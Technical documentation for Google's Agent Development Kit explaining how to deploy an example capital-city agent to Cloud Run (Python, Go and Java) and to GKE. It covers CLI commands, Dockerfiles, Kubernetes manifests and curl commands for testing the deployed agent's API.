## Deployment commands ### adk CLI The `adk deploy cloud_run` command deploys your agent code to Google Cloud Run. Ensure you have authenticated with Google Cloud (`gcloud auth login` and `gcloud config set project `). #### Setup environment variables Optional but recommended: Setting environment variables can make the deployment commands cleaner. ```bash # Set your Google Cloud Project ID export GOOGLE_CLOUD_PROJECT="your-gcp-project-id" # Set your desired Google Cloud Location export GOOGLE_CLOUD_LOCATION="us-central1" # Example location # Set the path to your agent code directory export AGENT_PATH="./capital_agent" # Assuming capital_agent is in the current directory # Set a name for your Cloud Run service (optional) export SERVICE_NAME="capital-agent-service" # Set an application name (optional) export APP_NAME="capital_agent_app" ``` #### Command usage ##### Minimal command ```bash adk deploy cloud_run \ --project=$GOOGLE_CLOUD_PROJECT \ --region=$GOOGLE_CLOUD_LOCATION \ $AGENT_PATH ``` ##### Full command with optional flags ```bash adk deploy cloud_run \ --project=$GOOGLE_CLOUD_PROJECT \ --region=$GOOGLE_CLOUD_LOCATION \ --service_name=$SERVICE_NAME \ --app_name=$APP_NAME \ --with_ui \ $AGENT_PATH ``` ##### Arguments - `AGENT_PATH`: (Required) Positional argument specifying the path to the directory containing your agent's source code (e.g., `$AGENT_PATH` in the examples, or `capital_agent/`). This directory must contain at least an `__init__.py` and your main agent file (e.g., `agent.py`). ##### Options - `--project TEXT`: (Required) Your Google Cloud project ID (e.g., `$GOOGLE_CLOUD_PROJECT`). - `--region TEXT`: (Required) The Google Cloud location for deployment (e.g., `$GOOGLE_CLOUD_LOCATION`, `us-central1`). - `--service_name TEXT`: (Optional) The name for the Cloud Run service (e.g., `$SERVICE_NAME`). Defaults to `adk-default-service-name`. - `--app_name TEXT`: (Optional) The application name for the ADK API server (e.g., `$APP_NAME`). 
Defaults to the name of the directory specified by `AGENT_PATH` (e.g., `capital_agent` if `AGENT_PATH` is `./capital_agent`).
- `--agent_engine_id TEXT`: (Optional) If you are using a managed session service via Vertex AI Agent Engine, provide its resource ID here.
- `--port INTEGER`: (Optional) The port number the ADK API server will listen on within the container. Defaults to 8000.
- `--with_ui`: (Optional) If included, deploys the ADK dev UI alongside the agent API server. By default, only the API server is deployed.
- `--temp_folder TEXT`: (Optional) Specifies a directory for storing intermediate files generated during the deployment process. Defaults to a timestamped folder in the system's temporary directory. *(Note: This option is generally not needed unless troubleshooting issues).*
- `--help`: Show the help message and exit.

##### Passing gcloud CLI Arguments

To pass specific gcloud flags through the `adk deploy cloud_run` command, use the double-dash separator (`--`) after the ADK arguments. Any flags following the `--` (except those managed by ADK) are passed directly to the underlying gcloud command.

###### Syntax Example:

```bash
adk deploy cloud_run [ADK_FLAGS] -- [GCLOUD_FLAGS]
```

###### Example:

```bash
adk deploy cloud_run --project=[PROJECT_ID] --region=[REGION] path/to/my_agent -- --no-allow-unauthenticated --min-instances=2
```

##### Authenticated access

During the deployment process, you might be prompted: `Allow unauthenticated invocations to [your-service-name] (y/N)?`.

- Enter `y` to allow public access to your agent's API endpoint without authentication.
- Enter `N` (or press Enter for the default) to require authentication (e.g., using an identity token as shown in the "Testing your agent" section).

Upon successful execution, the command deploys your agent to Cloud Run and provides the URL of the deployed service.

### gcloud CLI for Python

Alternatively, you can deploy using the standard `gcloud run deploy` command with a `Dockerfile`.
This method requires more manual setup compared to the `adk` command but offers flexibility, particularly if you want to embed your agent within a custom [FastAPI](https://fastapi.tiangolo.com/) application. Ensure you have authenticated with Google Cloud (`gcloud auth login` and `gcloud config set project `). #### Project Structure Organize your project files as follows: ```text your-project-directory/ ├── capital_agent/ │ ├── __init__.py │ └── agent.py # Your agent code (see "Agent sample" tab) ├── main.py # FastAPI application entry point ├── requirements.txt # Python dependencies └── Dockerfile # Container build instructions ``` Create the following files (`main.py`, `requirements.txt`, `Dockerfile`) in the root of `your-project-directory/`. #### Code files 1. This file sets up the FastAPI application using `get_fast_api_app()` from ADK: main.py ```python import os import uvicorn from fastapi import FastAPI from google.adk.cli.fast_api import get_fast_api_app # Get the directory where main.py is located AGENT_DIR = os.path.dirname(os.path.abspath(__file__)) # Example session service URI (e.g., SQLite) # Note: Use 'sqlite+aiosqlite' instead of 'sqlite' because DatabaseSessionService requires an async driver SESSION_SERVICE_URI = "sqlite+aiosqlite:///./sessions.db" # Example allowed origins for CORS ALLOWED_ORIGINS = ["http://localhost", "http://localhost:8080", "*"] # Set web=True if you intend to serve a web interface, False otherwise SERVE_WEB_INTERFACE = True # Call the function to get the FastAPI app instance # Ensure the agent directory name ('capital_agent') matches your agent folder app: FastAPI = get_fast_api_app( agents_dir=AGENT_DIR, session_service_uri=SESSION_SERVICE_URI, allow_origins=ALLOWED_ORIGINS, web=SERVE_WEB_INTERFACE, ) # You can add more FastAPI routes or configurations below if needed # Example: # @app.get("/hello") # async def read_root(): # return {"Hello": "World"} if __name__ == "__main__": # Use the PORT environment variable provided 
by Cloud Run, defaulting to 8080
    uvicorn.run(app, host="0.0.0.0", port=int(os.environ.get("PORT", 8080)))
```

*Note: We set `agents_dir` to the directory `main.py` is in and use `os.environ.get("PORT", 8080)` for Cloud Run compatibility.*

1. List the necessary Python packages (`requirements.txt`):

```text
google-adk
# Add any other dependencies your agent needs
```

1. Define the container image (`Dockerfile`):

```dockerfile
FROM python:3.13-slim
WORKDIR /app

COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt

RUN adduser --disabled-password --gecos "" myuser && \
    chown -R myuser:myuser /app

COPY . .

USER myuser

ENV PATH="/home/myuser/.local/bin:$PATH"

CMD ["sh", "-c", "uvicorn main:app --host 0.0.0.0 --port $PORT"]
```

#### Defining Multiple Agents

You can define and deploy multiple agents within the same Cloud Run instance by creating separate folders in the root of `your-project-directory/`. Each folder represents one agent and must define a `root_agent` in its configuration.

Example structure:

```text
your-project-directory/
├── capital_agent/
│   ├── __init__.py
│   └── agent.py       # contains `root_agent` definition
├── population_agent/
│   ├── __init__.py
│   └── agent.py       # contains `root_agent` definition
└── ...
```

#### Deploy using `gcloud`

Navigate to `your-project-directory` in your terminal.

```bash
gcloud run deploy capital-agent-service \
--source . \
--region $GOOGLE_CLOUD_LOCATION \
--project $GOOGLE_CLOUD_PROJECT \
--allow-unauthenticated \
--set-env-vars="GOOGLE_CLOUD_PROJECT=$GOOGLE_CLOUD_PROJECT,GOOGLE_CLOUD_LOCATION=$GOOGLE_CLOUD_LOCATION,GOOGLE_GENAI_USE_VERTEXAI=$GOOGLE_GENAI_USE_VERTEXAI"
# Add any other necessary environment variables your agent might need
```

- `capital-agent-service`: The name you want to give your Cloud Run service.
- `--source .`: Tells gcloud to build the container image from the Dockerfile in the current directory.
- `--region`: Specifies the deployment region.
- `--project`: Specifies the GCP project.
- `--allow-unauthenticated`: Allows public access to the service. Remove this flag for private services. - `--set-env-vars`: Passes necessary environment variables to the running container. Ensure you include all variables required by ADK and your agent (like API keys if not using Application Default Credentials). `gcloud` will build the Docker image, push it to Google Artifact Registry, and deploy it to Cloud Run. Upon completion, it will output the URL of your deployed service. For a full list of deployment options, see the [`gcloud run deploy` reference documentation](https://cloud.google.com/sdk/gcloud/reference/run/deploy). ### adk CLI The adkgo command is located in the google/adk-go repository under cmd/adkgo. Before using it, you need to build it from the root of the adk-go repository: `go build ./cmd/adkgo` The adkgo deploy cloudrun command automates the deployment of your application. You do not need to provide your own Dockerfile. #### Agent Code Structure When using the adkgo tool, your main.go file must use the launcher framework. This is because the tool compiles your code and then runs the resulting executable with specific command-line arguments (like web, api, a2a) to start the required services. The launcher is designed to parse these arguments correctly. Your main.go should look like this: main.go ```go // Copyright 2025 Google LLC // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. 
package main import ( "context" "fmt" "log" "os" "strings" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/cmd/launcher" "google.golang.org/adk/cmd/launcher/full" "google.golang.org/adk/model/gemini" "google.golang.org/adk/tool" "google.golang.org/adk/tool/functiontool" "google.golang.org/genai" ) type getCapitalCityArgs struct { Country string `json:"country" jsonschema:"The country for which to find the capital city."` } func getCapitalCity(ctx tool.Context, args getCapitalCityArgs) (string, error) { capitals := map[string]string{ "united states": "Washington, D.C.", "canada": "Ottawa", "france": "Paris", "japan": "Tokyo", } capital, ok := capitals[strings.ToLower(args.Country)] if !ok { return "", fmt.Errorf("couldn't find the capital for %s", args.Country) } return capital, nil } func main() { ctx := context.Background() model, err := gemini.NewModel(ctx, "gemini-2.5-flash", &genai.ClientConfig{ APIKey: os.Getenv("GOOGLE_API_KEY"), }) if err != nil { log.Fatalf("Failed to create model: %v", err) } capitalTool, err := functiontool.New( functiontool.Config{ Name: "get_capital_city", Description: "Retrieves the capital city for a given country.", }, getCapitalCity, ) if err != nil { log.Fatalf("Failed to create function tool: %v", err) } geoAgent, err := llmagent.New(llmagent.Config{ Name: "capital_agent", Model: model, Description: "Agent to find the capital city of a country.", Instruction: "I can answer your questions about the capital city of a country.", Tools: []tool.Tool{capitalTool}, }) if err != nil { log.Fatalf("Failed to create agent: %v", err) } config := &launcher.Config{ AgentLoader: agent.NewSingleLoader(geoAgent), } l := full.NewLauncher() err = l.Execute(ctx, config, os.Args[1:]) if err != nil { log.Fatalf("run failed: %v\n\n%s", err, l.CommandLineSyntax()) } } ``` #### How it Works 1. The adkgo tool compiles your main.go into a statically linked binary for Linux. 1. 
It generates a Dockerfile that copies this binary into a minimal container. 1. It uses gcloud to build and deploy this container to Cloud Run. 1. After deployment, it starts a local proxy that securely connects to your new service. Ensure you have authenticated with Google Cloud (`gcloud auth login` and `gcloud config set project `). #### Setup environment variables Optional but recommended: Setting environment variables can make the deployment commands cleaner. ```bash # Set your Google Cloud Project ID export GOOGLE_CLOUD_PROJECT="your-gcp-project-id" # Set your desired Google Cloud Location export GOOGLE_CLOUD_LOCATION="us-central1" # Set the path to your agent's main Go file export AGENT_PATH="./examples/go/cloud-run/main.go" # Set a name for your Cloud Run service export SERVICE_NAME="capital-agent-service" ``` #### Command usage ```bash ./adkgo deploy cloudrun \ -p $GOOGLE_CLOUD_PROJECT \ -r $GOOGLE_CLOUD_LOCATION \ -s $SERVICE_NAME \ --proxy_port=8081 \ --server_port=8080 \ -e $AGENT_PATH \ --a2a --api --webui ``` ##### Required - `-p, --project_name`: Your Google Cloud project ID (e.g., $GOOGLE_CLOUD_PROJECT). - `-r, --region`: The Google Cloud location for deployment (e.g., $GOOGLE_CLOUD_LOCATION, us-central1). - `-s, --service_name`: The name for the Cloud Run service (e.g., $SERVICE_NAME). - `-e, --entry_point_path`: Path to the main Go file containing your agent's source code (e.g., $AGENT_PATH). ##### Optional - `--proxy_port`: The local port for the authenticating proxy to listen on. Defaults to 8081. - `--server_port`: The port number the server will listen on within the Cloud Run container. Defaults to 8080. - `--a2a`: If included, enables Agent2Agent communication. Enabled by default. - `--a2a_agent_url`: A2A agent card URL as advertised in the public agent card. This flag is only valid when used with the --a2a flag. - `--api`: If included, deploys the ADK API server. Enabled by default. 
- `--webui`: If included, deploys the ADK dev UI alongside the agent API server. Enabled by default.
- `--temp_dir`: Temp directory for build artifacts. Defaults to `os.TempDir()`.
- `--help`: Show the help message and exit.

##### Authenticated access

The service is deployed with `--no-allow-unauthenticated` by default.

Upon successful execution, the command deploys your agent to Cloud Run and provides a local URL to access the service through the proxy.

### gcloud CLI for Java

You can deploy Java agents using the standard `gcloud run deploy` command and a `Dockerfile`. This is the current recommended way to deploy Java agents to Google Cloud Run.

Ensure you are [authenticated](https://cloud.google.com/docs/authentication/gcloud) with Google Cloud. Specifically, run the commands `gcloud auth login` and `gcloud config set project ` from your terminal.

#### Project Structure

Organize your project files as follows:

```text
your-project-directory/
├── src/
│   └── main/
│       └── java/
│           └── agents/
│               └── capitalagent/
│                   └── CapitalAgent.java    # Your agent code
├── pom.xml                                  # Java adk and adk-dev dependencies
└── Dockerfile                               # Container build instructions
```

Create the `pom.xml` and `Dockerfile` in the root of your project directory. Place your agent code file (`CapitalAgent.java`) inside the directory shown above.

#### Code files

1. This is our agent definition. It is the same code as presented in [LLM agent](https://google.github.io/adk-docs/agents/llm-agents/index.md), with two caveats:

    - The agent is now initialized as a **global public static final variable**.
    - The definition of the agent can be exposed in a static method or inlined during declaration.

    See the code for the `CapitalAgent` example in the [examples](https://github.com/google/adk-docs/blob/main/examples/java/cloud-run/src/main/java/agents/capitalagent/CapitalAgent.java) repository.

1. Add the following dependencies and plugin to the pom.xml file.
pom.xml

```xml
<dependencies>
  <dependency>
    <groupId>com.google.adk</groupId>
    <artifactId>google-adk</artifactId>
    <version>0.5.0</version>
  </dependency>
  <dependency>
    <groupId>com.google.adk</groupId>
    <artifactId>google-adk-dev</artifactId>
    <version>0.5.0</version>
  </dependency>
</dependencies>

<plugin>
  <groupId>org.codehaus.mojo</groupId>
  <artifactId>exec-maven-plugin</artifactId>
  <version>3.2.0</version>
  <configuration>
    <mainClass>com.google.adk.web.AdkWebServer</mainClass>
    <classpathScope>compile</classpathScope>
  </configuration>
</plugin>
```

1. Define the container image:

Dockerfile

```dockerfile
# Use an official Maven image with a JDK. Choose a version appropriate for your project.
FROM maven:3.8-openjdk-17 AS builder

WORKDIR /app

COPY pom.xml .
RUN mvn dependency:go-offline -B

COPY src ./src

# Expose the port your application will listen on.
# Cloud Run will set the PORT environment variable, which your app should use.
EXPOSE 8080

# The command to run your application.
# Use a shell so ${PORT} expands and quote exec.args so agent source-dir is passed correctly.
ENTRYPOINT ["sh", "-c", "mvn compile exec:java \
    -Dexec.mainClass=com.google.adk.web.AdkWebServer \
    -Dexec.classpathScope=compile \
    -Dexec.args='--server.port=${PORT:-8080} --adk.agents.source-dir=target'"]
```

#### Deploy using `gcloud`

Navigate to `your-project-directory` in your terminal.

```bash
gcloud run deploy capital-agent-service \
--source . \
--region $GOOGLE_CLOUD_LOCATION \
--project $GOOGLE_CLOUD_PROJECT \
--allow-unauthenticated \
--set-env-vars="GOOGLE_CLOUD_PROJECT=$GOOGLE_CLOUD_PROJECT,GOOGLE_CLOUD_LOCATION=$GOOGLE_CLOUD_LOCATION,GOOGLE_GENAI_USE_VERTEXAI=$GOOGLE_GENAI_USE_VERTEXAI"
# Add any other necessary environment variables your agent might need
```

- `capital-agent-service`: The name you want to give your Cloud Run service.
- `--source .`: Tells gcloud to build the container image from the Dockerfile in the current directory.
- `--region`: Specifies the deployment region.
- `--project`: Specifies the GCP project.
- `--allow-unauthenticated`: Allows public access to the service. Remove this flag for private services.
- `--set-env-vars`: Passes necessary environment variables to the running container. Ensure you include all variables required by ADK and your agent (like API keys if not using Application Default Credentials).
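The `--set-env-vars` value in the command above is a comma-separated list of `KEY=VALUE` pairs. As a small illustration, the hypothetical helper below (not part of ADK or gcloud) assembles that string from a dictionary. It is a simplified sketch that rejects values containing commas, since the plain comma-separated form cannot express them.

```python
from typing import Mapping


def format_set_env_vars(env: Mapping[str, str]) -> str:
    """Build the --set-env-vars argument from a mapping of variables."""
    pairs = []
    for key, value in env.items():
        if "," in value:
            # Simplification: comma-containing values are out of scope here.
            raise ValueError(f"value for {key} contains a comma")
        pairs.append(f"{key}={value}")
    return "--set-env-vars=" + ",".join(pairs)


# Placeholder values; substitute your own project settings.
flag = format_set_env_vars(
    {
        "GOOGLE_CLOUD_PROJECT": "your-project-id",
        "GOOGLE_CLOUD_LOCATION": "us-central1",
        "GOOGLE_GENAI_USE_VERTEXAI": "True",
    }
)
print(flag)
```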
`gcloud` will build the Docker image, push it to Google Artifact Registry, and deploy it to Cloud Run. Upon completion, it will output the URL of your deployed service.

For a full list of deployment options, see the [`gcloud run deploy` reference documentation](https://cloud.google.com/sdk/gcloud/reference/run/deploy).

## Testing your agent

Once your agent is deployed to Cloud Run, you can interact with it via the deployed UI (if enabled) or directly with its API endpoints using tools like `curl`. You'll need the service URL provided after deployment.

### UI Testing

If you deployed your agent with the UI enabled:

- **adk CLI:** You included the `--with_ui` flag during deployment (`--webui` when using `adkgo`).
- **gcloud CLI:** You set `SERVE_WEB_INTERFACE = True` in your `main.py`.

You can test your agent by navigating in your web browser to the Cloud Run service URL provided after deployment.

```bash
# Example URL format
# https://your-service-name-abc123xyz.a.run.app
```

The ADK dev UI allows you to interact with your agent, manage sessions, and view execution details directly in the browser.

To verify your agent is working as intended, you can:

1. Select your agent from the dropdown menu.
1. Type a message and verify that you receive an expected response from your agent.

If you experience any unexpected behavior, check the [Cloud Run](https://console.cloud.google.com/run) console logs.

### API Testing (curl)

You can interact with the agent's API endpoints using tools like `curl`. This is useful for programmatic interaction or if you deployed without the UI.

You'll need the service URL provided after deployment and potentially an identity token for authentication if your service isn't set to allow unauthenticated access.

#### Set the application URL

Replace the example URL with the actual URL of your deployed Cloud Run service.
```bash export APP_URL="YOUR_CLOUD_RUN_SERVICE_URL" # Example: export APP_URL="https://adk-default-service-name-abc123xyz.a.run.app" ``` #### Get an identity token (if needed) If your service requires authentication (i.e., you didn't use `--allow-unauthenticated` with `gcloud` or answered 'N' to the prompt with `adk`), obtain an identity token. ```bash export TOKEN=$(gcloud auth print-identity-token) ``` *If your service allows unauthenticated access, you can omit the `-H "Authorization: Bearer $TOKEN"` header from the `curl` commands below.* #### List available apps Verify the deployed application name. ```bash curl -X GET -H "Authorization: Bearer $TOKEN" $APP_URL/list-apps ``` *(Adjust the `app_name` in the following commands based on this output if needed. The default is often the agent directory name, e.g., `capital_agent`)*. #### Create or Update a Session Initialize or update the state for a specific user and session. Replace `capital_agent` with your actual app name if different. The values `user_123` and `session_abc` are example identifiers; you can replace them with your desired user and session IDs. ```bash curl -X POST -H "Authorization: Bearer $TOKEN" \ $APP_URL/apps/capital_agent/users/user_123/sessions/session_abc \ -H "Content-Type: application/json" \ -d '{"preferred_language": "English", "visit_count": 5}' ``` #### Run the Agent Send a prompt to your agent. Replace `capital_agent` with your app name and adjust the user/session IDs and prompt as needed. ```bash curl -X POST -H "Authorization: Bearer $TOKEN" \ $APP_URL/run_sse \ -H "Content-Type: application/json" \ -d '{ "app_name": "capital_agent", "user_id": "user_123", "session_id": "session_abc", "new_message": { "role": "user", "parts": [{ "text": "What is the capital of Canada?" }] }, "streaming": false }' ``` - Set `"streaming": true` if you want to receive Server-Sent Events (SSE). - The response will contain the agent's execution events, including the final answer. 
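The same request can also be assembled from Python. The sketch below uses only the standard library; `build_run_request` is a hypothetical helper, the URL is a placeholder, and the payload fields simply mirror the `curl` example above rather than documenting the full API.

```python
import json
import urllib.request
from typing import Optional


def build_run_request(
    app_url: str,
    app_name: str,
    user_id: str,
    session_id: str,
    text: str,
    token: Optional[str] = None,
    streaming: bool = False,
) -> urllib.request.Request:
    """Build (but do not send) a POST request for the /run_sse endpoint."""
    payload = {
        "app_name": app_name,
        "user_id": user_id,
        "session_id": session_id,
        "new_message": {"role": "user", "parts": [{"text": text}]},
        "streaming": streaming,
    }
    headers = {"Content-Type": "application/json"}
    if token:  # omit the header when the service allows unauthenticated access
        headers["Authorization"] = f"Bearer {token}"
    return urllib.request.Request(
        url=app_url.rstrip("/") + "/run_sse",
        data=json.dumps(payload).encode("utf-8"),
        headers=headers,
        method="POST",
    )


request = build_run_request(
    "https://example.invalid",  # placeholder, not a real service URL
    "capital_agent",
    "user_123",
    "session_abc",
    "What is the capital of Canada?",
)
print(request.full_url)
# To send it, pass the request to urllib.request.urlopen and read the body.
```

Separating request construction from sending makes it possible to inspect the URL, headers, and body without contacting the deployed service.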
# Deploy to Google Kubernetes Engine (GKE)

Supported in ADK: Python

[GKE](https://cloud.google.com/gke) is the Google Cloud managed Kubernetes service. It allows you to deploy and manage containerized applications using Kubernetes.

To deploy your agent, you need a Kubernetes cluster running on GKE. You can create a cluster using the Google Cloud Console or the `gcloud` command line tool.

In this example we will deploy a simple agent to GKE. The agent will be a FastAPI application that uses `Gemini 2.0 Flash` as the LLM. You can select Vertex AI or AI Studio as the LLM provider with the environment variable `GOOGLE_GENAI_USE_VERTEXAI`.

## Environment variables

Set your environment variables as described in the [Setup and Installation](https://google.github.io/adk-docs/get-started/installation/index.md) guide. You also need to install the `kubectl` command line tool. You can find instructions to do so in the [Google Kubernetes Engine Documentation](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-access-for-kubectl).

```bash
export GOOGLE_CLOUD_PROJECT=your-project-id # Your GCP project ID
export GOOGLE_CLOUD_LOCATION=us-central1 # Or your preferred location
export GOOGLE_GENAI_USE_VERTEXAI=true # Set to true if using Vertex AI
export GOOGLE_CLOUD_PROJECT_NUMBER=$(gcloud projects describe --format json $GOOGLE_CLOUD_PROJECT | jq -r ".projectNumber")
```

If you don't have `jq` installed, you can use the following command to get the project number:

```bash
gcloud projects describe $GOOGLE_CLOUD_PROJECT
```

Then copy the project number from the output:

```bash
export GOOGLE_CLOUD_PROJECT_NUMBER=YOUR_PROJECT_NUMBER
```

## Enable APIs and Permissions

Ensure you have authenticated with Google Cloud (`gcloud auth login` and `gcloud config set project `).

Enable the necessary APIs for your project. You can do this using the `gcloud` command line tool.
```bash gcloud services enable \ container.googleapis.com \ artifactregistry.googleapis.com \ cloudbuild.googleapis.com \ aiplatform.googleapis.com ``` Grant necessary roles to the default compute engine service account required by the `gcloud builds submit` command. ```bash ROLES_TO_ASSIGN=( "roles/artifactregistry.writer" "roles/storage.objectViewer" "roles/logging.viewer" "roles/logging.logWriter" ) for ROLE in "${ROLES_TO_ASSIGN[@]}"; do gcloud projects add-iam-policy-binding "${GOOGLE_CLOUD_PROJECT}" \ --member="serviceAccount:${GOOGLE_CLOUD_PROJECT_NUMBER}-compute@developer.gserviceaccount.com" \ --role="${ROLE}" done ``` ## Deployment payload When you deploy your ADK agent workflow to the Google Cloud GKE, the following content is uploaded to the service: - Your ADK agent code - Any dependencies declared in your ADK agent code - ADK API server code version used by your agent The default deployment *does not* include the ADK web user interface libraries, unless you specify it as deployment setting, such as the `--with_ui` option for `adk deploy gke` command. ## Deployment options You can deploy your agent to GKE either **manually using Kubernetes manifests** or **automatically using the `adk deploy gke` command**. Choose the approach that best suits your workflow. ## Option 1: Manual Deployment using gcloud and kubectl ### Create a GKE cluster You can create a GKE cluster using the `gcloud` command line tool. This example creates an Autopilot cluster named `adk-cluster` in the `us-central1` region. > If creating a GKE Standard cluster, make sure [Workload Identity](https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity) is enabled. Workload Identity is enabled by default in an AutoPilot cluster. ```bash gcloud container clusters create-auto adk-cluster \ --location=$GOOGLE_CLOUD_LOCATION \ --project=$GOOGLE_CLOUD_PROJECT ``` After creating the cluster, you need to connect to it using `kubectl`. 
This command configures `kubectl` to use the credentials for your new cluster. ```bash gcloud container clusters get-credentials adk-cluster \ --location=$GOOGLE_CLOUD_LOCATION \ --project=$GOOGLE_CLOUD_PROJECT ``` ### Create Your Agent We will reference the `capital_agent` example defined on the [LLM agents](https://google.github.io/adk-docs/agents/llm-agents/index.md) page. To proceed, organize your project files as follows: ```text your-project-directory/ ├── capital_agent/ │ ├── __init__.py │ └── agent.py # Your agent code (see "Capital Agent example" below) ├── main.py # FastAPI application entry point ├── requirements.txt # Python dependencies └── Dockerfile # Container build instructions ``` ### Code files Create the following files (`main.py`, `requirements.txt`, `Dockerfile`, `capital_agent/agent.py`, `capital_agent/__init__.py`) in the root of `your-project-directory/`. 1. This is the Capital Agent example inside the `capital_agent` directory capital_agent/agent.py ```python from google.adk.agents import LlmAgent # Define a tool function def get_capital_city(country: str) -> str: """Retrieves the capital city for a given country.""" # Replace with actual logic (e.g., API call, database lookup) capitals = {"france": "Paris", "japan": "Tokyo", "canada": "Ottawa"} return capitals.get(country.lower(), f"Sorry, I don't know the capital of {country}.") # Add the tool to the agent capital_agent = LlmAgent( model="gemini-2.0-flash", name="capital_agent", #name of your agent description="Answers user questions about the capital city of a given country.", instruction="""You are an agent that provides the capital city of a country... (previous instruction text)""", tools=[get_capital_city] # Provide the function directly ) # ADK will discover the root_agent instance root_agent = capital_agent ``` Mark your directory as a python package capital_agent/__init__.py ```python from . import agent ``` 1. 
This file sets up the FastAPI application using `get_fast_api_app()` from ADK:

main.py

```python
import os

import uvicorn
from fastapi import FastAPI
from google.adk.cli.fast_api import get_fast_api_app

# Get the directory where main.py is located
AGENT_DIR = os.path.dirname(os.path.abspath(__file__))
# Example session service URI (e.g., SQLite)
# Note: Use 'sqlite+aiosqlite' instead of 'sqlite' because DatabaseSessionService requires an async driver
SESSION_SERVICE_URI = "sqlite+aiosqlite:///./sessions.db"
# Example allowed origins for CORS
ALLOWED_ORIGINS = ["http://localhost", "http://localhost:8080", "*"]
# Set web=True if you intend to serve a web interface, False otherwise
SERVE_WEB_INTERFACE = True

# Call the function to get the FastAPI app instance
# Ensure the agent directory name ('capital_agent') matches your agent folder
app: FastAPI = get_fast_api_app(
    agents_dir=AGENT_DIR,
    session_service_uri=SESSION_SERVICE_URI,
    allow_origins=ALLOWED_ORIGINS,
    web=SERVE_WEB_INTERFACE,
)

# You can add more FastAPI routes or configurations below if needed
# Example:
# @app.get("/hello")
# async def read_root():
#     return {"Hello": "World"}

if __name__ == "__main__":
    # Use the PORT environment variable (set by the deployment manifest or by Cloud Run), defaulting to 8080
    uvicorn.run(app, host="0.0.0.0", port=int(os.environ.get("PORT", 8080)))
```

*Note: We set `agents_dir` to the directory that contains `main.py` and read the port from `os.environ.get("PORT", 8080)`, so the same entry point works with the `PORT` variable set in the Kubernetes manifest and on Cloud Run.*

1. List the necessary Python packages:

requirements.txt

```text
google-adk
# Add any other dependencies your agent needs
```

1. Define the container image:

Dockerfile

```dockerfile
FROM python:3.13-slim
WORKDIR /app

COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt

RUN adduser --disabled-password --gecos "" myuser && \
    chown -R myuser:myuser /app

COPY . .
USER myuser ENV PATH="/home/myuser/.local/bin:$PATH" CMD ["sh", "-c", "uvicorn main:app --host 0.0.0.0 --port $PORT"] ``` ### Build the container image You need to create a Google Artifact Registry repository to store your container images. You can do this using the `gcloud` command line tool. ```bash gcloud artifacts repositories create adk-repo \ --repository-format=docker \ --location=$GOOGLE_CLOUD_LOCATION \ --description="ADK repository" ``` Build the container image using the `gcloud` command line tool. This example builds the image and tags it as `adk-repo/adk-agent:latest`. ```bash gcloud builds submit \ --tag $GOOGLE_CLOUD_LOCATION-docker.pkg.dev/$GOOGLE_CLOUD_PROJECT/adk-repo/adk-agent:latest \ --project=$GOOGLE_CLOUD_PROJECT \ . ``` Verify the image is built and pushed to the Artifact Registry: ```bash gcloud artifacts docker images list \ $GOOGLE_CLOUD_LOCATION-docker.pkg.dev/$GOOGLE_CLOUD_PROJECT/adk-repo \ --project=$GOOGLE_CLOUD_PROJECT ``` ### Configure Kubernetes Service Account for Vertex AI If your agent uses Vertex AI, you need to create a Kubernetes service account with the necessary permissions. This example creates a service account named `adk-agent-sa` and binds it to the `Vertex AI User` role. > If you are using AI Studio and accessing the model with an API key you can skip this step. ```bash kubectl create serviceaccount adk-agent-sa ``` ```bash gcloud projects add-iam-policy-binding projects/${GOOGLE_CLOUD_PROJECT} \ --role=roles/aiplatform.user \ --member=principal://iam.googleapis.com/projects/${GOOGLE_CLOUD_PROJECT_NUMBER}/locations/global/workloadIdentityPools/${GOOGLE_CLOUD_PROJECT}.svc.id.goog/subject/ns/default/sa/adk-agent-sa \ --condition=None ``` ### Create the Kubernetes manifest files Create a Kubernetes deployment manifest file named `deployment.yaml` in your project directory. This file defines how to deploy your application on GKE. 
deployment.yaml ```yaml cat << EOF > deployment.yaml apiVersion: apps/v1 kind: Deployment metadata: name: adk-agent spec: replicas: 1 selector: matchLabels: app: adk-agent template: metadata: labels: app: adk-agent spec: serviceAccount: adk-agent-sa containers: - name: adk-agent imagePullPolicy: Always image: $GOOGLE_CLOUD_LOCATION-docker.pkg.dev/$GOOGLE_CLOUD_PROJECT/adk-repo/adk-agent:latest resources: limits: memory: "128Mi" cpu: "500m" ephemeral-storage: "128Mi" requests: memory: "128Mi" cpu: "500m" ephemeral-storage: "128Mi" ports: - containerPort: 8080 env: - name: PORT value: "8080" - name: GOOGLE_CLOUD_PROJECT value: $GOOGLE_CLOUD_PROJECT - name: GOOGLE_CLOUD_LOCATION value: $GOOGLE_CLOUD_LOCATION - name: GOOGLE_GENAI_USE_VERTEXAI value: "$GOOGLE_GENAI_USE_VERTEXAI" # If using AI Studio, set GOOGLE_GENAI_USE_VERTEXAI to false and set the following: # - name: GOOGLE_API_KEY # value: $GOOGLE_API_KEY # Add any other necessary environment variables your agent might need --- apiVersion: v1 kind: Service metadata: name: adk-agent spec: type: LoadBalancer ports: - port: 80 targetPort: 8080 selector: app: adk-agent EOF ``` ### Deploy the Application Deploy the application using the `kubectl` command line tool. This command applies the deployment and service manifest files to your GKE cluster. ```bash kubectl apply -f deployment.yaml ``` After a few moments, you can check the status of your deployment using: ```bash kubectl get pods -l=app=adk-agent ``` This command lists the pods associated with your deployment. You should see a pod with a status of `Running`. Once the pod is running, you can check the status of the service using: ```bash kubectl get service adk-agent ``` If the output shows a `External IP`, it means your service is accessible from the internet. It may take a few minutes for the external IP to be assigned. 
